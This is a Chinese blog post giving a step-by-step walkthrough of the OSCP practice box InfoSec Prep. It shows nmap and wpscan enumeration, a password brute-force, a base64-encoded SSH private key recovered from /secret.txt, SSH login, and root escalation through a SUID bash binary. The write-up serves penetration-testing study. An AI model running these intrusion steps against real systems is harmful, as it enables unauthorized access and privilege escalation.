OSCP系列靶场-Esay-InfosecPrep保姆级

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: OSCP 文章标签: web安全 网络 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61812944/article/details/132342590
版权

OSCP系列靶场-Esay-InfosecPrep

目录

总结

getwebshell → 通过目录扫描得到robots.txt端点 → robots.txt存在敏感目录 → 访问敏感目录得到base64加密信息 → 解密得到ssh密钥 → 信息收集得到用户名 → 免密ssh登录

提 权 思 路 → 内网信息收集 → suid-bash直接提权

准备工作

  • 启动VPN
    获取攻击机IP → 192.168.45.206

  • 启动靶机
    获取目标机器IP → 192.168.152.89

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次
sudo nmap --min-rate 10000 -p- 192.168.152.89

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx

开放的端口-→22,80,33060

目标端口对应服务探测

# tcp探测
sudo nmap -sT -sV -O -sC -p22,80,33060 192.168.152.89

PORT      STATE SERVICE VERSION                                
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu 
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用

通过Nmap探测获得SSH的版本信息,可以尝试利用
探测版本为OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 

# 搜索对应脚本
msf6 → searchsploit OpenSSH 8.2p1

无相关漏洞详情

22-SSH协议支持的登录方式

通过Nmap探测获得SSH的版本信息,在获取到某个用户名之后尝试

ssh root @192.168.152.89 -v

显示publickey就是只支持密钥登录

80-HTTP端口的信息收集

访问 http://192.168.152.89:80 像一个cms进行指纹搜集

信息收集-网站指纹
whatweb http://192.168.152.89:80

版本号也报了出来,优先尝试通用漏洞 WordPress 5.4.2

漏洞利用-网站指纹
searchsploit WordPress 5.4.2

发现需要插件

信息收集-漏洞扫描wpscan

因为cms的原因,针对wordpress的专用扫描器

# -e枚举 ap枚举插件 u枚举用户名 t枚举主题
wpscan --url http://192.168.152.89:80 --enumerate ap,u,t

通过爆破发现了用户名admin


发现一些没什么大危害的漏洞

# 暴力破解admin密码
wpscan --url http://192.168.152.89:80 -U admin -P /usr/share/wordlists/rockyou.txt

这边挂着我们去研究其他内容

信息收集-HTML隐藏信息查看
# 包括文章中是否写明一些敏感信息
curl http://192.168.152.89:80

无隐藏信息

信息收集-目录扫描
信息收集-目录扫描初步
dirsearch -u http://192.168.152.89:80 -x 302,403


因为扫出了目录,深层次的扫描待选

信息收集-目录扫描(后缀)
信息收集-目录扫描(深度/大字典)
信息收集-目录扫描(深度/大字典后缀)
信息收集-目录访问
/robots.txt端点

访问后得到了一个新的端点/secret.txt

/secret.txt端点

得到了一串代码,带 == 推测是base64

base64解密
curl http://192.168.152.89:80/secret.txt | base64 -d

解密之后发现是私钥

curl http://192.168.152.89:80/secret.txt | base64 -d → is_rsa

将其保存成一个文件is_rsa方便后续利用

其他端点

另外端点是wp的端点,因为发现了私钥,所以先待定

33060端口的信息收集

nmap探测知道是一个mysqlxmysql数据库应该有一定的关联
不过从80端口我们已经获取了进入的key,就不探究33060端口了

漏洞利用-getwebshell

利用root连接私钥(失败)

获取了ssh免密登录的私钥后以为是root的,我飘了

sudo ssh -i is_rsa root @192.168.152.89 -p22

root用户不能私钥登录

利用admin连接私钥(失败)

想到了wpscan收集到的admin用户

sudo ssh -i is_rsa admin @192.168.152.89 -p22

也不行 G!

爆破用户名(好像没有这工具)

我以为可以用hyrda在已知私钥的情况下爆破用户名,好像没这个命令。

遗漏的信息收集

我傻了,网站官方上写明了

Oh yea! Almost forgot the only user on this box is “oscp”.

唯一的用户是oscp

可以尝试利用oscp进行爆破

ssh私钥登录

sudo ssh -i is_rsa oscp @192.168.152.89 -p22

ohhhh 能进去但是我权限开大了

chmod 600 is_rsa
sudo ssh -i is_rsa oscp @192.168.152.89 -p22

内网遨游-getshell

FLAG1获取

-bash-5.0$ find / -name local.txt 2→/dev/null
/home/oscp/local.txt
-bash-5.0$ cat /home/oscp/local.txt
10c23c2c5f69e180a3970f10b2a236ef

信息收集-内网基础信息收集

提权的本质在于枚举,在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测Linux操作系统的发行版本

较老的Ubuntu以及Linux系统可以overlayfs提权

# 确定发行版本
-bash-5.0$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 20.04 LTS
Release:        20.04
Codename:       focal

发行版本为Ubuntu 20.04,不太能overlayfs提权

检测Linux操作系统的内核版本

较低的内核版本可以进行脏牛提权

-bash-5.0$ uname -a
Linux oscp 5.4.0-40-generic #44-Ubuntu SMP Tue Jun 23 00:01:04 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

内核版本为5.4.0

列举出所有的sudo文件

查找具有sudo权限,且不需要密码的可提权文件
如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找

# 利用sudo -l寻找
sudo -l

发现需要密码

列举出所有suid文件

如果发现u=s有东西的话 访问 https://gtfobins.github.io 寻找

# -perm 文件权限
find / -perm -u=s -type f 2→/dev/null

/snap/core18/1754/bin/umount
/snap/core18/1754/usr/bin/chfn
/snap/core18/1754/usr/bin/chsh
/snap/core18/1754/usr/bin/gpasswd
/snap/core18/1754/usr/bin/newgrp
/snap/core18/1754/usr/bin/passwd
/snap/core18/1754/usr/bin/sudo
/snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1754/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su

虽然多,重点关注/usr目录下发现了bash直接会心一笑

权限提升

bash权限提升


通过查找使用上述命令将直接提权

以下命令将以root身份打开一个bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)


提权成功

FLAG2获取

bash-5.0# cat /root/proof.txt
abb2ed5f2c5147f3881508eaade611db

完结撒花~

反思

当我通关提权了,wpscan还在扫描,应该用cewl生成字典较好,不然太多了

以后应该把网站上的信息收集加入进来

密钥可以再次base64,密钥的格式为

-----BEGIN OPENSSH PRIVATE KEY-----
内容
-----END OPENSSH PRIVATE KEY-----

# 针对内容再次base64解密也可以得到用户名
cat test.txt | baes64 -d

杳若听闻
关注
专栏目录
Vulnhub: InfoSec Prep:OSCP靶机
qq_43884092的博客
05-07 709
secret.txt获得ssh私钥,suid提权
【OSCP系列靶场-Esay-Potato】
Technology_77的博客
09-14 306
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。根据收集的数据和经验,改进蜜罐配置和网络安全防御。从初代到现在,黑客发展逐渐有了对于名号的划分,从1999年起的“中美黑客大战”,Honker这一词逐渐进入人们的眼球。总的来说,Easy Potato是一个强大的蜜罐系统,可以帮助提升蜜罐的有效性和网络安全防御。这些都值得耐人寻味,不过,黑客这一词在莎士比亚的那个年代就存在了,最早的计算机诞生于1946年宾夕法尼亚大学,而最早的黑客却出现在。
红队打靶练习:INFOSEC PREP: OSCP
分享
01-31 1024
红队打靶练习:INFOSEC PREP: OSCP !! 很简单!最多五分钟结束!
vulnhub InfoSec Prep: OSCP
箭雨镜屋
08-10 799
渗透思路:nmap扫描端口 ---- 网站默认页面提示系统用户名 ---- /secret.txt中发现base64加密的私钥 ---- 转换私钥格式 ---- bash suid提权
vulhub上oscp InfoSec靶机渗透测试writeup
qq_44635376的博客
02-05 938
这里写目录标题信息搜集nmap搜集靶机信息访问80端口网站,探索网站信息阅读网页内容搜集到一个有效信息(这台主机的用户名是oscp)发现80端口下有/secret.txt文件,我们直接去访问看看,发现一串字符,这时候猜测应该是加密的什么重要内容,很兴奋。接下来我们要解密。这串加密像是base64加密,于是我在将密文下载到kali虚拟机中使用secret.txt命名。然后使用命令base64 -d secret.txt > private_key解密并将内容保存到private_key文件中,解密以后的
OSCP系列靶场-Esay-Ha-natraj
hackzkaq的博客
01-02 922
getwebshell → 目录扫描发现端点 → 发现文件读取 → 验证确认是文件包含 → 包含了ssh登录日志 → 反弹shell包含提 权 思 路 → 发现sudo别的apache2服务 →apache2服务启动时修改其用户权限 → 重启apache2从目录权限提升到用户权限 →sudo-nmap权限提升。
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2336
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1975
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全】-文件上传漏洞
weixin_65311462的博客
09-10 924
文件上传漏洞指hacker能利用网站能让用户上传文件的功能,在上传过程中上传木马,直接连接或配合文件包含漏洞获取webshell,从而导致用户权限丢失,隐私泄露。成功getshell后hacker还可以长期控制受影响的网站或服务器,进行持续性的攻击和破坏,甚至会将受控制的服务器作为攻击其他目标的跳板,利用该服务器的资源和网络带宽发起更广泛的网络攻击。
网络安全】-文件上传漏洞实战-upload-labs(0~16)
weixin_65311462的博客
09-09 1504
准备:一句话木马:
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 701
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
零基础小白能学网络安全吗?
2401_83781461的博客
09-11 292
网络安全涉及很多内容、计算机网络、暴力破解、安全工具、漏洞扫描、渗透测试、社会工程学、密码学、编程能力等等等等,学习起来需要大量的时间和精力。首先,问出这个问题的朋友,我大致判断一下,你对网络安全并不了解,只是单纯看到某个视频某篇文章,对其感兴趣,说白了你没有足够的动力驱动。但这并不意味着你不能学习。如果你正好是相反之人,可以先接触学学看,如果真的很难理解其中的概念和原理,那么或许你真的不适合学习网络安全。在大众眼中,网络安全可能就是黑别人网站的,账号被盗了能帮忙找到的,还有遇见老赖问能不能找到这个人的。
网络安全】-文件下载漏洞-pikachu
weixin_65311462的博客
09-11 1059
网站对用户查看和下载文件不做限制,使hacker可以利用利用这些文件进行提权操作,完全控制服务器,进而以服务器为跳板攻击网站其他系统,进一步扩大攻击范围。文件上传漏洞是指hacker利用网站或web应用系统中用户上传文件的功能,在上传过程中上传恶意文件,这些恶意文件在服务器端被解析时产生漏洞,从而导致攻击者能够在服务器上执行任意代码的一种安全漏洞。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 905
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全 L2 Introduction to Cryptography 密码学
weixin_74400487的博客
09-12 1164
2.1.2.Integrity3.4.1. no observer can access the contents of the message.确保只有授权的接收者能够阅读或访问消息,防止未授权的第三方获取敏感信息。2. no observer can identify the sender and receiver.保护通信双方的身份信息,防止第三方知道谁在发送消息以及消息是发送给谁的。
网络安全】服务基础第二阶段——第五节:Linux系统管理基础----Linux常见应用服务(Apache、数据库)
goldfish8848的博客
09-12 1119
在Linux系统中,有许多常见的应用服务,它们用于执行各种任务,如网页托管、数据库管理、文件传输等。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值